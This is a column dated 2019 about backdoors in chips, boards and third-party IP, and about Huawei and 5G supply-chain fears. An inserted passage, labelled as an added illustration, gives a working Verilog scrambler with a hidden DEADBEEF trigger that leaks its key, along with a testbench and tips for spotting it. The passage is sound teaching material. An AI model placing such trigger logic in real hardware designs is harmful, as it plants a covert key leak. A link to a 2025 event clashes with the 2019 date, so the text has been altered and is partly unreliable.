“Holy Security Systems Batman!” Our Boards are Bugged!

Clive "Max" Maxfield
Published in Supplyframe
Nov 6, 2019

Recently, I’ve been thinking a lot about security. The term “backdoor” refers to any mechanism that lets someone bypass a system’s normal security controls (authentication, access control, and so on). Some backdoors are unintentional, the result of hardware or software design flaws that attackers discover and exploit; some are deliberately built into the hardware or software by its designers; yet others are planted in higher-level systems after the fact by nefarious parties.

There are several ways in which backdoors can be introduced to a system. In the case of software, a backdoor could be incorporated as a hidden part of an application program, of the operating system (OS), or of the firmware on the board. There is also malware, Trojan horses for example, that installs a backdoor when it is executed.

In the case of hardware, one or more of the off-the-shelf integrated circuits used in a design may contain hardwired backdoors. Alternatively, if you are designing a System-on-Chip (SoC) and you purchase intellectual property (IP) blocks from third-party vendors, those blocks may themselves contain backdoors.

When you are talking about hundreds of thousands of lines of hardware description language (HDL) code, a backdoor that occupies only a few dozen of those lines can be almost impossible to spot, even if you have access to the source code. In many cases, however, the IP is delivered in encrypted form that only the synthesis tool can decrypt, which means you have no chance at all of inspecting it.
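To make concrete why a few lines can hide inside a large block of HDL, here is an added example of my own; it is not from the column and does not represent any real vendor’s IP. It is a hypothetical 8-bit “scrambler” peripheral that does exactly what its specification says (XOR the input byte with a key) until a particular four-byte sequence arrives on the data input, after which it quietly emits the key instead of the scrambled data. The module and signal names, the trigger value, and the testbench are all assumptions made for illustration.

```verilog
// Added illustration, not code from the column or from any vendor's IP.
// A hypothetical scrambler with a hidden trigger. Normal operation XORs
// each input byte with the key. Once a chosen 32-bit sequence has been
// seen on data_in, a sticky flag is set and the key is leaked on data_out.
// The trigger constant is made up; nothing here maps to a real device.
module scrambler (
    input  wire       clk,
    input  wire       rst_n,
    input  wire [7:0] key,
    input  wire [7:0] data_in,
    input  wire       valid,
    output reg  [7:0] data_out
);
    // Legitimate datapath: one-cycle XOR with the key.
    wire [7:0] scrambled = data_in ^ key;

    // --- Trojan payload (a handful of lines among the "real" logic) ---
    // Shift register over the last four valid bytes. The pattern is chosen
    // so that no ordinary functional test presents it by accident.
    reg [31:0] history;
    reg        armed;
    localparam [31:0] TRIGGER = 32'hDEAD_BEEF;  // hypothetical value

    always @(posedge clk or negedge rst_n) begin
        if (!rst_n) begin
            history  <= 32'h0;
            armed    <= 1'b0;
            data_out <= 8'h0;
        end else if (valid) begin
            history <= {history[23:0], data_in};
            if ({history[23:0], data_in} == TRIGGER)
                armed <= 1'b1;          // sticky: only a reset clears it
            // Once armed, the key replaces the scrambled byte.
            data_out <= armed ? key : scrambled;
        end
    end
endmodule

// Testbench: sends a normal byte, then the trigger, then observes the leak.
module tb;
    reg clk = 0, rst_n = 0, valid = 0;
    reg [7:0] key = 8'h5A, data_in = 8'h00;
    wire [7:0] data_out;

    scrambler dut (.clk(clk), .rst_n(rst_n), .key(key),
                   .data_in(data_in), .valid(valid), .data_out(data_out));

    always #5 clk = ~clk;

    task send(input [7:0] b);
        begin
            @(negedge clk); data_in = b; valid = 1;
            @(negedge clk); valid = 0;
        end
    endtask

    initial begin
        #12 rst_n = 1;
        send(8'h01);   // normal: data_out = 01 ^ 5A = 5B
        $display("before trigger: data_out = %h", data_out);
        send(8'hDE); send(8'hAD); send(8'hBE); send(8'hEF);  // trigger
        send(8'h01);   // now data_out = key = 5A, not 5B
        $display("after trigger:  data_out = %h (key = %h)", data_out, key);
        $finish;
    end
endmodule
```

Two things are worth noticing. First, a functional test suite that exercises the scrambler with random or representative traffic will pass: the payload only changes behavior after one specific sequence that the tests never send. Second, the tell-tale signs a reviewer can look for are exactly the things that don’t belong in the specification: state that is sticky and never cleared except by reset, a comparison against a magic constant, and an output mux that depends on state unrelated to the documented function. Those are easy to list and hard to find by eye in several hundred thousand lines, and they are invisible in an encrypted deliverable.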

In earlier columns, I mused on US-China Tariffs, Trade, and Technology (see Part 1 and Part 2). With regard to the Chinese communications behemoth, Huawei (pronounced “hoo-ah-way”), I noted that a lot of people are worried that Huawei either has, or may in the future, put backdoors into their equipment.

Some of the concerns with Huawei are based on the fact that its Founder and CEO, Ren Zhengfei, worked as an engineer in the Information Technology Research Unit of the People’s Liberation Army (PLA) for close to 10 years. Ren also has strong ties with China’s communist party.

There have been numerous reports of China hacking American computer networks and stealing data. It’s also concerning that China recently introduced its National Intelligence Law (2017), Article Seven of which states: “All organizations and citizens shall, in accordance with the law, support, cooperate with, and collaborate in national intelligence work, and guard the secrecy of national intelligence work they are aware of.”

A recent article on WIRED described just how easy it may be to hide malicious chips inside IT equipment. At the All Things Open conference in October 2019, a Hardware Hacking 101 talk described how rogue keyboards can be used to unleash pre-programmed keystroke payloads, where these payloads can include, “reverse shells, binary injection, brute force password attacks, and just about any attack that can be fully automated.”

In October 2018, Bloomberg Businessweek published a provocative article, The Big Hack: How China Used a Tiny Chip to Infiltrate U.S. Companies (the details were subsequently questioned in this article and elaborated on in this piece).

Sometimes it’s hard to know what to believe, so I asked a friend who is a security expert and active in this area. He told me about a router motherboard his company had been asked to examine because it was behaving strangely.

The board in question was of Chinese origin but was not directly manufactured by Huawei. Using an infrared imager, they observed a hot spot under one of the chips. When they de-soldered the main chip, they found a smaller undocumented chip embedded in the board. My friend told me that the function of this chip was nefarious in nature, but that he was not at liberty to discuss this in any detail. My friend went on to say:

There are multiple domains that can be used to examine chips/motherboards for implants. Infrared, X-Ray, radio, dynamic power analysis and more. And, the device doesn’t have to be very large to compromise the board management controller (BMC). I think that the important information is that this is very doable and, with a largish budget, you can miniaturize something to be almost undetectable. Unfortunately, I really can’t say any more about it and I’ve probably already said too much.

There are two science fiction books by Vernor Vinge that made a big impression on me. The first was A Fire Upon the Deep, which can loosely be described as a space opera set in the far distant future in various locations around the Milky Way involving superhuman intelligences, aliens, variable physics, space battles, love, betrayal, and genocide. Vernor followed this masterpiece with a prequel called A Deepness in the Sky, which is set 20,000 years earlier. It’s this latter tome that is relevant to our discussions here.

In addition to more aliens than you can swing a stick at, there are two groups of humans — the Qeng Ho, who are traders, and the Emergents, who aren’t very nice. After a fight, the Emergents subjugate the Qeng Ho. Posing as an inept and bumbling fleet elder, one of the Qeng Ho manages to introduce backdoors into the Emergents’ oppressive security systems, eventually using these backdoors to subvert the Emergents’ systems and save the day.

The reason I mention all this here is that it made me think about what might happen if countries like the US allow a company like Huawei to provide the 5G infrastructure that will dominate next-generation communications.

In addition to the possibility of an unfriendly nation state being able to monitor all of our communications, there’s also the possibility of them inserting their own messages into the stream (as a disinformation strategy to spread FUD; i.e., fear, uncertainty, and doubt), modifying existing messages while they are en route, or editing archived messages to reflect an alternate reality.

Even worse, 5G will eventually come in three flavors — Enhanced Mobile Broadband (eMBB), Ultra Reliable Low Latency Communications (URLLC), and Massive Machine Type Communications (mMTC) — and is expected to subsume the vast majority of our communications capabilities (see also 5G Meets 50,000 Fans at Super Bowl 2025).

Now, suppose that there are backdoors into every piece of equipment that allows our adversaries to throw “kill switches” and shut everything down, from power stations to water treatment plants to… well, pretty much everything.

Is this likely to happen? I don’t know. Might it be a possibility at some time in the future? Almost certainly, unless we start paying attention to where we obtain our integrated circuits (or the IP we use to build our own), our systems, and our software. What do you think about all of this? Are you as worried as I am?

Over the years, Max has designed everything from silicon chips to circuit boards and from brainwave amplifiers to Steampunk Prognostication Engines (don’t ask).